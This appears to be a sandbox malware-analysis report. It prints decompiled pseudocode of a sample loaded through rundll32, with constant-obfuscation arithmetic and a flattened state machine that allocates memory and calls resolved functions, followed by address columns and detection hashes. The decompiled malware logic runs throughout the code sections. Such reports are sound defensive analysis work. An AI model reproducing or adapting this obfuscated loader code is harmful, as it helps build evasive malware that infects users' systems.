				_v316 = _v316 ^ 0xf1f4b434;
				_v524 = 0x2e48d0;
				_v524 = _v524 + 0xffff862d;
				_v524 = _v524 + 0x29e8;
				_v524 = _v524 * 0x4b;
				_v524 = _v524 ^ 0x0d7cea3a;
				_v384 = 0x8701af;
				_v384 = _v384 + 0xf5cc;
				_v384 = _v384 >> 7;
				_v384 = _v384 ^ 0x000bfa6c;
				_v484 = 0x89e0a0;
				_v484 = _v484 >> 6;
				_v484 = _v484 << 0xd;
				_v484 = _v484 | 0xc3b3473c;
				_v484 = _v484 ^ 0xc7fe9c77;
				_v516 = 0xee0a8f;
				_v516 = _v516 ^ 0x55897709;
				_v516 = _v516 | 0x2d6779b6;
				_v516 = _v516 >> 0xc;
				_v516 = _v516 ^ 0x0009a0b5;
				_v408 = 0x69ddc;
				_v408 = _v408 + 0xffff558a;
				_v408 = _v408 | 0x7b9a8e55;
				_v408 = _v408 ^ 0x7b9d6bde;
				_v440 = 0x3ec00a;
				_t708 = 7;
				_v440 = _v440 * 0x6d;
				_v440 = _v440 ^ 0x82501226;
				_v440 = _v440 ^ 0x98e12210;
				_v360 = 0xa9836;
				_t709 = 0x66;
				_v360 = _v360 / _t708;
				_v360 = _v360 ^ 0x000ed550;
				_v508 = 0xae1f70;
				_v508 = _v508 / _t709;
				_v508 = _v508 | 0xf9ffdfbb;
				_v508 = _v508 ^ 0xf9f8fc25;
				_v324 = 0xeedbe0;
				_v324 = _v324 + 0xffffa9bd;
				_v324 = _v324 ^ 0x00e20b5f;
				_v392 = 0x6a2c5c;
				_v392 = _v392 | 0xb7dff57a;
				_v392 = _v392 << 0xb;
				_v392 = _v392 ^ 0xffee34eb;
				_v432 = 0x407729;
				_v432 = _v432 + 0xb79f;
				_v432 = _v432 | 0x8bf66f7a;
				_v432 = _v432 ^ 0x8bfc9481;
				_v424 = 0x63ea97;
				_v424 = _v424 >> 0x10;
				_v424 = _v424 + 0xffffc4e0;
				_v424 = _v424 ^ 0xfffae0f6;
				_v332 = 0x7c55b7;
				_t710 = 0x1b;
				_v332 = _v332 / _t710;
				_v332 = _v332 ^ 0x0008067b;
				_v352 = 0x1d2ffa;
				_t711 = 0x70;
				_v352 = _v352 * 0x3b;
				_v352 = _v352 ^ 0x06b3fb37;
				_v416 = 0x356707;
				_t712 = 0x4d;
				_v416 = _v416 / _t711;
				_v416 = _v416 * 0xf;
				_v416 = _v416 ^ 0x000a8be6;
				_v400 = 0x975723;
				_v400 = _v400 | 0x269443d2;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x2eac99c7;
				_v396 = 0x86389d;
				_v396 = _v396 ^ 0xdd3767b8;
				_t713 = 0x6d;
				_v396 = _v396 / _t712;
				_v396 = _v396 ^ 0x02eba2ca;
				_v404 = 0xdbbdba;
				_v404 = _v404 << 9;
				_v404 = _v404 / _t713;
				_v404 = _v404 ^ 0x01a57735;
				_v356 = 0xfabb05;
				_v356 = _v356 | 0x8af6c05e;
				_v356 = _v356 ^ 0x8af1d93b;
				_v380 = 0x2efe0b;
				_v380 = _v380 | 0x60ccafe9;
				_v380 = _v380 >> 2;
				_v380 = _v380 ^ 0x183e3099;
				_v348 = 0x4aabda;
				_v348 = _v348 ^ 0x6d9ddbef;
				_v348 = _v348 ^ 0x6dd36298;
				_v388 = 0x49b388;
				_v388 = _v388 | 0xfd8f470c;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0x3fdfba02;
				_v472 = 0xbd7846;
				_v472 = _v472 + 0xffff85c8;
				_v472 = _v472 >> 0xd;
				_v472 = _v472 >> 0xc;
				_v472 = _v472 ^ 0x00060807;
				_v456 = 0xd92e51;
				_t714 = 0x17;
				_v456 = _v456 / _t714;
				_v456 = _v456 >> 0xd;
				_v456 = _v456 + 0xffff8d85;
				_v456 = _v456 ^ 0xfffee4a4;
				_v340 = 0x27bb27;
				_v340 = _v340 | 0xb25f39d4;
				_v340 = _v340 ^ 0xb27a85e4;
				_v464 = 0x5d8dc9;
				_v464 = _v464 + 0x522d;
				_v464 = _v464 << 1;
				_t623 = 0xb;
				_v464 = _v464 / _t623;
				_v464 = _v464 ^ 0x0017bd02;
				_v364 = 0xb86d20;
				_v364 = _v364 + 0x9843;
				_v364 = _v364 ^ 0x00bb00fc;
				_v480 = 0x632eda;
				_v480 = _v480 + 0xffff6eee;
				_v480 = _v480 + 0xffff8324;
				_v480 = _v480 + 0x3513;
				_v480 = _v480 ^ 0x006160eb;
				_v412 = 0xc84084;
				_t715 = 0x19;
				_t729 = _v312;
				_t624 = _v312;
				_v412 = _v412 / _t715;
				_v412 = _v412 | 0x26b33a0b;
				_v412 = _v412 ^ 0x26bcb4da;
				_v420 = 0x8ac001;
				_v420 = _v420 << 0xf;
				_v420 = _v420 ^ 0xe10d88e3;
				_v420 = _v420 ^ 0x810a258e;
				while(1) {
					L1:
					while(1) {
						_t686 = 0x14e2fae;
						do {
							while(1) {
								L3:
								_t736 = _t723 - 0x6872271;
								if(_t736 <= 0) {
									break;
								}
								__eflags = _t723 - 0x6af60a9;
								if(_t723 == 0x6af60a9) {
									_push(0x4000);
									_push(0x4000);
									_t574 = E00353512(0x4000);
									_v536 = _t574;
									__eflags = _t574;
									if(__eflags == 0) {
										_t633 = _v488;
										_t723 = 0x3b379fe;
										_t686 = 0x14e2fae;
										goto L31;
									}
									_t723 = 0x2b997a9;
									L13:
									_t633 = _v488;
									_t686 = 0x14e2fae;
									continue;
								}
								__eflags = _t723 - 0x6fc00ac;
								if(_t723 == 0x6fc00ac) {
									_t724 =  &_v256;
									_t687 = E0034EF71(8, 0x10);
									_t578 = _v520;
									__eflags = _t578 - _t687;
									if(_t578 < _t687) {
										_t689 = _t687 - _t578;
										_t719 = _t724;
										_t654 = _t689 >> 1;
										__eflags = _t654;
										_t621 = memset(_t719, 0x2d002d, _t654 << 2);
										asm("adc ecx, ecx");
										_t724 = _t724 + _t689 * 2;
										memset(_t719 + _t654, _t621, 0);
										_t730 =  &(_t730[6]);
									}
									_push(E0034EF71(8, 0x10));
									_push(_v436);
									_push(_t724);
									_t636 = 0xb;
									E00345A07(_t636, _v428);
									_t730 =  &(_t730[5]);
									_t723 = 0x6af60a9;
									L12:
									_t583 = _v536;
									goto L13;
								}
								__eflags = _t723 - 0xa6d69a8;
								if(_t723 == 0xa6d69a8) {
									_t722 = E0034EF71(1, 8);
									_push(_t722);
									_push(_v328);
									_push( &_v288);
									_t637 = 9;
									E00345A07(_t637, _v336);
									_t730 =  &(_t730[5]);
									_t723 = 0xb1820f0;
									goto L12;
								}
								__eflags = _t723 - 0xb1820f0;
								if(_t723 == 0xb1820f0) {
									_t722 = E0034EF71(4, 0x10);
									_push(_t722);
									_push(_v452);
									_push( &_v128);
									_t638 = 0xb;
									E00345A07(_t638, _v500);
									_t730 =  &(_t730[5]);
									_t723 = 0x6fc00ac;
									goto L12;
								}
								__eflags = _t723 - 0xff9e75d;
								if(__eflags != 0) {
									goto L31;
								}
								_t723 = 0xa6d69a8;
							}
							if(_t736 == 0) {
								E0035FD29( *_t633, _v416, _t624, _v400,  *((intOrPtr*)(_t633 + 4)));
								_t488 =  &_v488; // 0x6160eb
								_t633 =  *_t488;
								_t730 =  &(_t730[3]);
								_t723 = 0x605d68b;
								_t624 = _t624 +  *((intOrPtr*)(_t633 + 4));
								goto L1;
							}
							if(_t723 == _t686) {
								_push(0x34141c);
								_push(_v360);
								_v308 = _t722 + _t729;
								_t624 = E0034F545( &_v128, __eflags, _v508, _t722 + _t729 - _t729,  &_v256, _v324,  &_v288, _v392, E0034BB4B(_v408, _v440, __eflags), _v432) + _t729;
								E0034AE03(_v424, _v332, _v352, _t595);
								_t730 =  &(_t730[0xc]);
								_t723 = 0x6872271;
								goto L12;
							}
							if(_t723 == 0x2109cc3) {
								_t722 = _t722 +  *((intOrPtr*)(_t633 + 4));
								_push(_t633);
								_push(_t633);
								_t729 = E00353512(_t722);
								_t583 = _v536;
								__eflags = _t729;
								_t633 = _v488;
								_t686 = 0x14e2fae;
								_t723 =  !=  ? 0x14e2fae : 0x6704547;
								goto L3;
							}
							if(_t723 == 0x2b997a9) {
								_push(_v492);
								_push(_v368);
								_push(0x3413bc);
								_t604 = E0034AB66(_v376, _v448, __eflags);
								_push( &_v256);
								_push(_t604);
								_push(_t722);
								_push(_v536);
								 *((intOrPtr*)(E0034C1DC(_v376, 0xbf7d08b0, 0xef)))();
								E0034AE03(_v460, _v316, _v524, _t604);
								_t730 =  &(_t730[9]);
								_t723 = 0x2109cc3;
								goto L12;
							}
							if(_t723 == 0x605d68b) {
								_push(0x34138c);
								_push(_v356);
								_t614 = E0034F060(E0034BB4B(_v396, _v404, __eflags), __eflags, _v348, _t624, _v308 - _t624, _v388,  &_v256, _v472);
								E0034AE03(_v456, _v340, _v464, _t610);
								_t616 = _v312;
								_t628 = _t624 + _t614 - _t729;
								__eflags = _t628;
								 *_t616 = _t729;
								 *(_t616 + 4) = _t628;
								L34:
								return _v536;
							}
							if(_t723 != 0x6704547) {
								goto L31;
							}
							E003468DE(_v364, _v480, _v412, _v420, _t583);
							return 0;
							L31:
							__eflags = _t723 - 0x3b379fe;
						} while (__eflags != 0);
						goto L34;
					}
				}
			}










































































































                                                                                                                      0x00356864
                                                                                                                      0x0035686e
                                                                                                                      0x00356875
                                                                                                                      0x00356879
                                                                                                                      0x00356881
                                                                                                                      0x0035688c
                                                                                                                      0x00356897
                                                                                                                      0x003568a2
                                                                                                                      0x003568af
                                                                                                                      0x003568b3
                                                                                                                      0x003568b8
                                                                                                                      0x003568c8
                                                                                                                      0x003568cd
                                                                                                                      0x003568d3
                                                                                                                      0x003568db
                                                                                                                      0x003568e3
                                                                                                                      0x003568e8
                                                                                                                      0x003568f0
                                                                                                                      0x003568f8
                                                                                                                      0x00356900
                                                                                                                      0x00356908
                                                                                                                      0x00356910
                                                                                                                      0x00356918
                                                                                                                      0x00356920
                                                                                                                      0x00356933
                                                                                                                      0x00356936
                                                                                                                      0x0035693d
                                                                                                                      0x00356948
                                                                                                                      0x00356953
                                                                                                                      0x0035695e
                                                                                                                      0x00356969
                                                                                                                      0x00356974
                                                                                                                      0x0035697c
                                                                                                                      0x00356987
                                                                                                                      0x00356994
                                                                                                                      0x00356998
                                                                                                                      0x003569a0
                                                                                                                      0x003569a5
                                                                                                                      0x003569ad
                                                                                                                      0x003569b5
                                                                                                                      0x003569ba
                                                                                                                      0x003569be
                                                                                                                      0x003569c3
                                                                                                                      0x003569c7
                                                                                                                      0x003569cf
                                                                                                                      0x003569d7
                                                                                                                      0x003569df
                                                                                                                      0x003569ed
                                                                                                                      0x003569ee
                                                                                                                      0x003569f2
                                                                                                                      0x003569fa
                                                                                                                      0x00356a05
                                                                                                                      0x00356a10
                                                                                                                      0x00356a1b
                                                                                                                      0x00356a23
                                                                                                                      0x00356a2b
                                                                                                                      0x00356a33
                                                                                                                      0x00356a38
                                                                                                                      0x00356a40
                                                                                                                      0x00356a48
                                                                                                                      0x00356a55
                                                                                                                      0x00356a59
                                                                                                                      0x00356a63
                                                                                                                      0x00356a73
                                                                                                                      0x00356a79
                                                                                                                      0x00356a81
                                                                                                                      0x00356a89
                                                                                                                      0x00356a91
                                                                                                                      0x00356a9c
                                                                                                                      0x00356aaf
                                                                                                                      0x00356ab2
                                                                                                                      0x00356ab9
                                                                                                                      0x00356ac4
                                                                                                                      0x00356acc
                                                                                                                      0x00356ad9
                                                                                                                      0x00356add
                                                                                                                      0x00356ae5
                                                                                                                      0x00356aed
                                                                                                                      0x00356af5
                                                                                                                      0x00356afe
                                                                                                                      0x00356b01
                                                                                                                      0x00356b05
                                                                                                                      0x00356b0d
                                                                                                                      0x00356b18
                                                                                                                      0x00356b20
                                                                                                                      0x00356b2b
                                                                                                                      0x00356b33
                                                                                                                      0x00356b3b
                                                                                                                      0x00356b43
                                                                                                                      0x00356b4b
                                                                                                                      0x00356b53
                                                                                                                      0x00356b5e
                                                                                                                      0x00356b69
                                                                                                                      0x00356b74
                                                                                                                      0x00356b7c
                                                                                                                      0x00356b84
                                                                                                                      0x00356b8c
                                                                                                                      0x00356b94
                                                                                                                      0x00356b9f
                                                                                                                      0x00356baa
                                                                                                                      0x00356bb5
                                                                                                                      0x00356bbd
                                                                                                                      0x00356bc5
                                                                                                                      0x00356bcd
                                                                                                                      0x00356bd5
                                                                                                                      0x00356bdd
                                                                                                                      0x00356be5
                                                                                                                      0x00356bea
                                                                                                                      0x00356bf2
                                                                                                                      0x00356bfa
                                                                                                                      0x00356c02
                                                                                                                      0x00356c0d
                                                                                                                      0x00356c18
                                                                                                                      0x00356c23
                                                                                                                      0x00356c2b
                                                                                                                      0x00356c33
                                                                                                                      0x00356c40
                                                                                                                      0x00356c44
                                                                                                                      0x00356c4c
                                                                                                                      0x00356c57
                                                                                                                      0x00356c62
                                                                                                                      0x00356c6a
                                                                                                                      0x00356c75
                                                                                                                      0x00356c7d
                                                                                                                      0x00356c82
                                                                                                                      0x00356c87
                                                                                                                      0x00356c8f
                                                                                                                      0x00356c97
                                                                                                                      0x00356c9f
                                                                                                                      0x00356ca7
                                                                                                                      0x00356caf
                                                                                                                      0x00356cb4
                                                                                                                      0x00356cbc
                                                                                                                      0x00356cc7
                                                                                                                      0x00356cd4
                                                                                                                      0x00356cdf
                                                                                                                      0x00356cea
                                                                                                                      0x00356cf9
                                                                                                                      0x00356cfc
                                                                                                                      0x00356d00
                                                                                                                      0x00356d08
                                                                                                                      0x00356d10
                                                                                                                      0x00356d24
                                                                                                                      0x00356d25
                                                                                                                      0x00356d2e
                                                                                                                      0x00356d39
                                                                                                                      0x00356d49
                                                                                                                      0x00356d4f
                                                                                                                      0x00356d57
                                                                                                                      0x00356d5f
                                                                                                                      0x00356d6a
                                                                                                                      0x00356d75
                                                                                                                      0x00356d80
                                                                                                                      0x00356d8b
                                                                                                                      0x00356d96
                                                                                                                      0x00356d9e
                                                                                                                      0x00356da9
                                                                                                                      0x00356db1
                                                                                                                      0x00356db9
                                                                                                                      0x00356dc1
                                                                                                                      0x00356dc9
                                                                                                                      0x00356dd4
                                                                                                                      0x00356ddc
                                                                                                                      0x00356de7
                                                                                                                      0x00356df2
                                                                                                                      0x00356e04
                                                                                                                      0x00356e09
                                                                                                                      0x00356e12
                                                                                                                      0x00356e1d
                                                                                                                      0x00356e30
                                                                                                                      0x00356e33
                                                                                                                      0x00356e3a
                                                                                                                      0x00356e45
                                                                                                                      0x00356e59
                                                                                                                      0x00356e5a
                                                                                                                      0x00356e6d
                                                                                                                      0x00356e74
                                                                                                                      0x00356e7f
                                                                                                                      0x00356e8a
                                                                                                                      0x00356e95
                                                                                                                      0x00356e9d
                                                                                                                      0x00356ea8
                                                                                                                      0x00356eb3
                                                                                                                      0x00356ec7
                                                                                                                      0x00356ec8
                                                                                                                      0x00356ecf
                                                                                                                      0x00356eda
                                                                                                                      0x00356ee5
                                                                                                                      0x00356efa
                                                                                                                      0x00356f03
                                                                                                                      0x00356f0e
                                                                                                                      0x00356f19
                                                                                                                      0x00356f24
                                                                                                                      0x00356f2f
                                                                                                                      0x00356f3a
                                                                                                                      0x00356f45
                                                                                                                      0x00356f4d
                                                                                                                      0x00356f58
                                                                                                                      0x00356f63
                                                                                                                      0x00356f6e
                                                                                                                      0x00356f79
                                                                                                                      0x00356f84
                                                                                                                      0x00356f8f
                                                                                                                      0x00356f97
                                                                                                                      0x00356fa2
                                                                                                                      0x00356faa
                                                                                                                      0x00356fb2
                                                                                                                      0x00356fb7
                                                                                                                      0x00356fbc
                                                                                                                      0x00356fc4
                                                                                                                      0x00356fd0
                                                                                                                      0x00356fd5
                                                                                                                      0x00356fdb
                                                                                                                      0x00356fe0
                                                                                                                      0x00356fe8
                                                                                                                      0x00356ff0
                                                                                                                      0x00356ffb
                                                                                                                      0x00357006
                                                                                                                      0x00357011
                                                                                                                      0x00357019
                                                                                                                      0x00357021
                                                                                                                      0x00357029
                                                                                                                      0x0035702e
                                                                                                                      0x00357034
                                                                                                                      0x0035703c
                                                                                                                      0x00357047
                                                                                                                      0x00357052
                                                                                                                      0x0035705d
                                                                                                                      0x00357065
                                                                                                                      0x0035706d
                                                                                                                      0x00357075
                                                                                                                      0x0035707d
                                                                                                                      0x00357085
                                                                                                                      0x00357097
                                                                                                                      0x003570a1
                                                                                                                      0x003570a8
                                                                                                                      0x003570af
                                                                                                                      0x003570b6
                                                                                                                      0x003570c1
                                                                                                                      0x003570cc
                                                                                                                      0x003570d7
                                                                                                                      0x003570df
                                                                                                                      0x003570ea
                                                                                                                      0x003570f5
                                                                                                                      0x003570f5
                                                                                                                      0x003570f9
                                                                                                                      0x003570f9
                                                                                                                      0x003570fe
                                                                                                                      0x003570fe
                                                                                                                      0x003570fe
                                                                                                                      0x003570fe
                                                                                                                      0x00357104
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003572d3
                                                                                                                      0x003572d9
                                                                                                                      0x00357418
                                                                                                                      0x00357419
                                                                                                                      0x0035741a
                                                                                                                      0x0035741f
                                                                                                                      0x00357425
                                                                                                                      0x00357427
                                                                                                                      0x00357433
                                                                                                                      0x00357437
                                                                                                                      0x0035743c
                                                                                                                      0x00000000
                                                                                                                      0x0035743c
                                                                                                                      0x00357429
                                                                                                                      0x003571d4
                                                                                                                      0x003571d4
                                                                                                                      0x003570f9
                                                                                                                      0x00000000
                                                                                                                      0x003570f9
                                                                                                                      0x003572df
                                                                                                                      0x003572e5
                                                                                                                      0x00357390
                                                                                                                      0x003573a7
                                                                                                                      0x003573a9
                                                                                                                      0x003573af
                                                                                                                      0x003573b1
                                                                                                                      0x003573b3
                                                                                                                      0x003573b5
                                                                                                                      0x003573be
                                                                                                                      0x003573be
                                                                                                                      0x003573c0
                                                                                                                      0x003573c2
                                                                                                                      0x003573c4
                                                                                                                      0x003573c7
                                                                                                                      0x003573c7
                                                                                                                      0x003573c7
                                                                                                                      0x003573dd
                                                                                                                      0x003573de
                                                                                                                      0x003573ec
                                                                                                                      0x003573ef
                                                                                                                      0x003573f0
                                                                                                                      0x003573f5
                                                                                                                      0x003573f8
                                                                                                                      0x003571d0
                                                                                                                      0x003571d0
                                                                                                                      0x00000000
                                                                                                                      0x003571d0
                                                                                                                      0x003572eb
                                                                                                                      0x003572f1
                                                                                                                      0x0035735e
                                                                                                                      0x00357367
                                                                                                                      0x00357368
                                                                                                                      0x00357376
                                                                                                                      0x00357379
                                                                                                                      0x0035737a
                                                                                                                      0x0035737f
                                                                                                                      0x00357382
                                                                                                                      0x00000000
                                                                                                                      0x00357382
                                                                                                                      0x003572f3
                                                                                                                      0x003572f9
                                                                                                                      0x00357325
                                                                                                                      0x0035732e
                                                                                                                      0x0035732f
                                                                                                                      0x00357337
                                                                                                                      0x0035733a
                                                                                                                      0x0035733b
                                                                                                                      0x00357340
                                                                                                                      0x00357343
                                                                                                                      0x00000000
                                                                                                                      0x00357343
                                                                                                                      0x003572fb
                                                                                                                      0x00357301
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00357307
                                                                                                                      0x00357307
                                                                                                                      0x0035710a
                                                                                                                      0x003572ba
                                                                                                                      0x003572bf
                                                                                                                      0x003572bf
                                                                                                                      0x003572c3
                                                                                                                      0x003572c6
                                                                                                                      0x003572cb
                                                                                                                      0x00000000
                                                                                                                      0x003572cb
                                                                                                                      0x00357112
                                                                                                                      0x00357218
                                                                                                                      0x0035721d
                                                                                                                      0x00357232
                                                                                                                      0x00357291
                                                                                                                      0x00357294
                                                                                                                      0x00357299
                                                                                                                      0x0035729c
                                                                                                                      0x00000000
                                                                                                                      0x0035729c
                                                                                                                      0x0035711e
                                                                                                                      0x003571e1
                                                                                                                      0x003571ef
                                                                                                                      0x003571f0
                                                                                                                      0x003571f8
                                                                                                                      0x003571ff
                                                                                                                      0x00357203
                                                                                                                      0x00357207
                                                                                                                      0x0035720b
                                                                                                                      0x00357210
                                                                                                                      0x00000000
                                                                                                                      0x00357210
                                                                                                                      0x0035712a
                                                                                                                      0x0035716d
                                                                                                                      0x00357171
                                                                                                                      0x00357183
                                                                                                                      0x00357188
                                                                                                                      0x0035719e
                                                                                                                      0x003571a3
                                                                                                                      0x003571a4
                                                                                                                      0x003571a5
                                                                                                                      0x003571b1
                                                                                                                      0x003571c3
                                                                                                                      0x003571c8
                                                                                                                      0x003571cb
                                                                                                                      0x00000000
                                                                                                                      0x003571cb
                                                                                                                      0x00357132
                                                                                                                      0x0035744f
                                                                                                                      0x00357454
                                                                                                                      0x0035749e
                                                                                                                      0x003574b8
                                                                                                                      0x003574bd
                                                                                                                      0x003574c7
                                                                                                                      0x003574c7
                                                                                                                      0x003574c9
                                                                                                                      0x003574cb
                                                                                                                      0x003574ce
                                                                                                                      0x00000000
                                                                                                                      0x003574ce
                                                                                                                      0x0035713e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035715e
                                                                                                                      0x00000000
                                                                                                                      0x00357441
                                                                                                                      0x00357441
                                                                                                                      0x00357441
                                                                                                                      0x00000000
                                                                                                                      0x0035744d
                                                                                                                      0x003570f9

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^Z$'xUx$(q$)E1$)w@$-R$:|$>,b$\,j$\f%$izV$`a$x
                                                                                                                      • API String ID: 0-215870970
                                                                                                                      • Opcode ID: c86624263ec19a909321a91818ada000c16eb3619b6e299e8d843c1229827d46
                                                                                                                      • Instruction ID: 0e9f8534a201c6f05e6547da2c9f6c04795aeff35774bd10be8e4552c0a6c908
                                                                                                                      • Opcode Fuzzy Hash: c86624263ec19a909321a91818ada000c16eb3619b6e299e8d843c1229827d46
                                                                                                                      • Instruction Fuzzy Hash: 225210725083819FD375CF25C98AB8BBBE1BBC4358F10891DE5DA9A260D7B09849CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00342FA1 Relevance: 16.8, Strings: 13, Instructions: 522COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00342FA1(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1588;
				char _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				void* _t602;
				void* _t605;
				void* _t612;
				void* _t615;
				void* _t627;
				void* _t629;
				signed int _t631;
				signed int _t632;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				void* _t647;
				signed int _t650;
				signed int _t696;
				signed int _t706;
				void* _t708;
				void* _t713;
				void* _t714;

				_v1568 = _v1568 & 0x00000000;
				_v1596 = _v1596 & 0x00000000;
				_v1576 = 0x5e97ec;
				_v1572 = 0x72e58f;
				_v1768 = 0x70cb3c;
				_v1768 = _v1768 + 0xffffc098;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 ^ 0x02000384;
				_v1820 = 0xee4d2b;
				_t15 =  &_v1820; // 0xee4d2b
				_t629 = __ecx;
				_t708 = 0x23fa72;
				_t631 = 0x3b;
				_v1820 =  *_t15 / _t631;
				_t632 = 0x76;
				_v1820 = _v1820 * 0x22;
				_v1820 = _v1820 + 0xffff6a70;
				_v1820 = _v1820 ^ 0x0087d8ad;
				_v1744 = 0x47ad5e;
				_v1744 = _v1744 + 0xffff8cd4;
				_v1744 = _v1744 * 0x70;
				_v1744 = _v1744 ^ 0x1f2feb3a;
				_v1628 = 0xf34c5;
				_v1628 = _v1628 + 0x5841;
				_v1628 = _v1628 ^ 0x0009a1de;
				_v1812 = 0x9823b5;
				_v1812 = _v1812 ^ 0xd7f45b6c;
				_v1812 = _v1812 / _t632;
				_v1812 = _v1812 ^ 0x01df5c7b;
				_v1812 = _v1812 ^ 0x000f259a;
				_v1608 = 0x734624;
				_v1608 = _v1608 >> 0xe;
				_v1608 = _v1608 ^ 0x000c01bf;
				_v1804 = 0xceac9b;
				_v1804 = _v1804 << 0x10;
				_t633 = 0x3d;
				_v1804 = _v1804 / _t633;
				_v1804 = _v1804 + 0x655b;
				_v1804 = _v1804 ^ 0x02dbc44e;
				_v1736 = 0x9be166;
				_v1736 = _v1736 >> 5;
				_v1736 = _v1736 ^ 0xd09875ee;
				_v1736 = _v1736 ^ 0xd0950b72;
				_v1824 = 0xc35391;
				_v1824 = _v1824 >> 3;
				_v1824 = _v1824 >> 0x10;
				_v1824 = _v1824 * 3;
				_v1824 = _v1824 ^ 0x00036b47;
				_v1800 = 0x15c07f;
				_v1800 = _v1800 << 9;
				_v1800 = _v1800 >> 4;
				_v1800 = _v1800 | 0x1ec023ab;
				_v1800 = _v1800 ^ 0x1effac55;
				_v1668 = 0x9ff678;
				_v1668 = _v1668 >> 6;
				_v1668 = _v1668 ^ 0x00061642;
				_v1676 = 0x388031;
				_v1676 = _v1676 + 0xa9e3;
				_v1676 = _v1676 ^ 0x003372a3;
				_v1700 = 0x68320b;
				_v1700 = _v1700 >> 9;
				_v1700 = _v1700 * 0x58;
				_v1700 = _v1700 ^ 0x00127519;
				_v1728 = 0x8bcc69;
				_v1728 = _v1728 + 0xffffee5b;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 ^ 0x000f8317;
				_v1620 = 0xdd5dd2;
				_v1620 = _v1620 + 0xffff3cca;
				_v1620 = _v1620 ^ 0x00d1dad8;
				_v1756 = 0x5b77fe;
				_v1756 = _v1756 >> 0x10;
				_v1756 = _v1756 + 0xcf07;
				_v1756 = _v1756 ^ 0x0002651f;
				_v1600 = 0xe5338f;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x0038d695;
				_v1748 = 0x539c61;
				_v1748 = _v1748 >> 4;
				_v1748 = _v1748 ^ 0x7ee23abc;
				_v1748 = _v1748 ^ 0x7eed6078;
				_v1660 = 0x8a8a87;
				_v1660 = _v1660 + 0xb3eb;
				_v1660 = _v1660 ^ 0x0081b7ad;
				_v1716 = 0x7622c2;
				_v1716 = _v1716 ^ 0x68bb0f30;
				_v1716 = _v1716 ^ 0x34de6465;
				_v1716 = _v1716 ^ 0x5c136dbb;
				_v1684 = 0xf6dfed;
				_v1684 = _v1684 << 0xb;
				_v1684 = _v1684 | 0x3f4bdd8f;
				_v1684 = _v1684 ^ 0xbff0253f;
				_v1816 = 0xe04e35;
				_v1816 = _v1816 >> 2;
				_v1816 = _v1816 + 0x327b;
				_v1816 = _v1816 + 0x911b;
				_v1816 = _v1816 ^ 0x003e79db;
				_v1612 = 0xd6f31e;
				_v1612 = _v1612 | 0x3022205e;
				_v1612 = _v1612 ^ 0x30f4c89e;
				_v1784 = 0xaf77e7;
				_t634 = 0x4a;
				_v1784 = _v1784 / _t634;
				_v1784 = _v1784 | 0x421bf711;
				_t635 = 0x50;
				_v1784 = _v1784 * 0x54;
				_v1784 = _v1784 ^ 0xb12f1f5b;
				_v1652 = 0xf84d37;
				_v1652 = _v1652 * 0x24;
				_v1652 = _v1652 ^ 0x22e540eb;
				_v1792 = 0xffdc51;
				_v1792 = _v1792 << 0xa;
				_v1792 = _v1792 | 0xe1b7830e;
				_v1792 = _v1792 + 0xffff0b40;
				_v1792 = _v1792 ^ 0xfffcd716;
				_v1740 = 0x197a11;
				_v1740 = _v1740 << 5;
				_v1740 = _v1740 / _t635;
				_v1740 = _v1740 ^ 0x00038a69;
				_v1644 = 0x6b00f0;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 ^ 0xac018c07;
				_v1604 = 0x611781;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x8bc919f5;
				_v1808 = 0xd36465;
				_t636 = 6;
				_v1808 = _v1808 * 0x36;
				_v1808 = _v1808 / _t636;
				_v1808 = _v1808 << 1;
				_v1808 = _v1808 ^ 0x0edf69e5;
				_v1832 = 0x3f9dc0;
